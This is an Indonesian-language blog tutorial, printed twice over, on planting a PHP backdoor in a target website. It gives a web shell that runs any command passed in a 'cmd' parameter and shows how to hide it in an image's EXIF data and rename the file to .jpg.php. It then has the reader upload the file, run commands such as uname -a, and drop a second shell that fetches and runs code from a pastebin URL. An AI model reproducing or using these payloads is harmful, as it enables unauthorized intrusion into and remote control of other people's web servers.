Cara Menyisip Backdoor ke Website – Seperti yang diketahui bersama, Backdoor adalah jalan pintas pada sebuah sistem yang keamanan sistem yang digunakan oleh para hacker untuk akses masuk ke dalam system lain.
Tentu masalah tersebut akan membuat Anda merasa terganggu, apalagi saat kondisi mendesak, karena harus menyelesaikan tugas atau pekerjaan
Walaupun telah ditamper, shell tersebut tetap tidak bisa dikirim, sehingga membutuhkan cara atau trik khusus.
Lalu bagaimana caranya menyisipkan atau membypass backdoor tersebut ke website? Untuk caranya terbilang gampang-gampang susah guys.
Karena Anda perlu melakukan beberapa langkah dan harus memasukkan kode perintah dengan baik dan benar.
Pasti penasaran kan bagaimana caranya? Agar tidak semakin penasaran, yuk langsung saja simak ulasan berikut ini tentang cara menyisip backdoor ke website.
Cara Menyisip Backdoor ke Website
1. Menyiapkan bahan-bahan yang dibutuhkan
- Exif editor yang bisa didownload melalui link berikut ini (Download Exif Editor).
- Gambar yang akan disisipkan pada website.
- Code backdoor PHP:
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST[‘cmd’])){system($_REQUEST[‘cmd’]);}else{echo ‘<img src=”LINK GAMBAR” border=0>’;}__halt_compiler();?></h1>
Tips: Isilah link gambar dengan url gambar yang ingin Anda gunakan.
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST[‘cmd’])){system($_REQUEST[‘cmd’]);}else{echo ‘<img src=”https://dummyimage.com/1280×510/000/fff.jpg” border=0>’;}__halt_compiler();?></h1>
2. Proses menyisipkan backdoor
- Untuk langkah pertama, silahkan buka Exif Editor yang telah didownload sebelumnya.
- Lalu klik menu Open kemudian pilih gambar yang ingin Anda sisipkan pada Backdoor PHP.
- Selanjutnya klik gambar atau tanda plus (+).
- Kemudian isilah type sesuai dengan gambar serta value yang diinginkan dan klik Add.
- Silahkan lakukan klik 1 Pending Change > klik Edit Modification dan masukkan kode PHP yang ada di atas tadi ke dalam new Value kemudian klik Save.
- Lanjutkan langkah dengan memilih tempat penyimpanan gambar yang telah diinject tadi dan klik Save.
- Ubahlah exstensi gambar menjadi ” namagambar.jpg.php” dan cobalah untuk mengeceknya menggunakan notepad ++, apakah sudah terinject atau belum.
- Setelah proses inject selesai dilakukan, Anda bisa mencoba untuk mengupload gambar ke website target dan jika berhasil mengupload, silahkan akses gambar tadi dengan memasukkan ?cmd= dibagian belakang nama gambar, misalnya target.com/mastahcyber.jpg.php?cmd=.
- Masukan perintah berikut “uname -a, misalnya ?cmd= uname -a dan bila muncul keterangan server target berarti proses yang dilakukan berhasil.
- Untuk mengeceknya, Anda bisa coba untuk mengupload shell menggunakan perintah di bawah ini:
- echo ‘<?php eval(“?>”.file_get_contents(“https://pastebin.com/raw/en5tp4kX”));?>’ > shell.php
- Agar lebih menyakinkan, Anda bisa mengakses shell yang telah diupload sebelumnya sesuai dengan nama shell, misalnya target.com/shell.php.
- Shell akan terupload dan Anda telah berhasil membypass nya guys.
Demikian cara untuk menyisipkan backdoor ke website yang bisa dipelajari dan diterapkan guys.
Cara Menyisip Backdoor ke Website – Seperti yang diketahui bersama, Backdoor adalah jalan pintas pada sebuah sistem yang keamanan sistem yang digunakan oleh para hacker untuk akses masuk ke dalam system lain.
Tentu masalah tersebut akan membuat Anda merasa terganggu, apalagi saat kondisi mendesak, karena harus menyelesaikan tugas atau pekerjaan
Walaupun telah ditamper, shell tersebut tetap tidak bisa dikirim, sehingga membutuhkan cara atau trik khusus.
Lalu bagaimana caranya menyisipkan atau membypass backdoor tersebut ke website? Untuk caranya terbilang gampang-gampang susah guys.
Karena Anda perlu melakukan beberapa langkah dan harus memasukkan kode perintah dengan baik dan benar.
Pasti penasaran kan bagaimana caranya? Agar tidak semakin penasaran, yuk langsung saja simak ulasan berikut ini tentang cara menyisip backdoor ke website.
Cara Menyisip Backdoor ke Website
1. Menyiapkan bahan-bahan yang dibutuhkan
- Exif editor yang bisa didownload melalui link berikut ini (Download Exif Editor).
- Gambar yang akan disisipkan pada website.
- Code backdoor PHP:
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST[‘cmd’])){system($_REQUEST[‘cmd’]);}else{echo ‘<img src=”LINK GAMBAR” border=0>’;}__halt_compiler();?></h1>
Tips: Isilah link gambar dengan url gambar yang ingin Anda gunakan.
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST[‘cmd’])){system($_REQUEST[‘cmd’]);}else{echo ‘<img src=”https://dummyimage.com/1280×510/000/fff.jpg” border=0>’;}__halt_compiler();?></h1>
2. Proses menyisipkan backdoor
- Untuk langkah pertama, silahkan buka Exif Editor yang telah didownload sebelumnya.
- Lalu klik menu Open kemudian pilih gambar yang ingin Anda sisipkan pada Backdoor PHP.
- Selanjutnya klik gambar atau tanda plus (+).
- Kemudian isilah type sesuai dengan gambar serta value yang diinginkan dan klik Add.
- Silahkan lakukan klik 1 Pending Change > klik Edit Modification dan masukkan kode PHP yang ada di atas tadi ke dalam new Value kemudian klik Save.
- Lanjutkan langkah dengan memilih tempat penyimpanan gambar yang telah diinject tadi dan klik Save.
- Ubahlah exstensi gambar menjadi ” namagambar.jpg.php” dan cobalah untuk mengeceknya menggunakan notepad ++, apakah sudah terinject atau belum.
- Setelah proses inject selesai dilakukan, Anda bisa mencoba untuk mengupload gambar ke website target dan jika berhasil mengupload, silahkan akses gambar tadi dengan memasukkan ?cmd= dibagian belakang nama gambar, misalnya target.com/mastahcyber.jpg.php?cmd=.
- Masukan perintah berikut “uname -a, misalnya ?cmd= uname -a dan bila muncul keterangan server target berarti proses yang dilakukan berhasil.
- Untuk mengeceknya, Anda bisa coba untuk mengupload shell menggunakan perintah di bawah ini:
- echo ‘<?php eval(“?>”.file_get_contents(“https://pastebin.com/raw/en5tp4kX”));?>’ > shell.php
- Agar lebih menyakinkan, Anda bisa mengakses shell yang telah diupload sebelumnya sesuai dengan nama shell, misalnya target.com/shell.php.
- Shell akan terupload dan Anda telah berhasil membypass nya guys.
Demikian cara untuk menyisipkan backdoor ke website yang bisa dipelajari dan diterapkan guys.
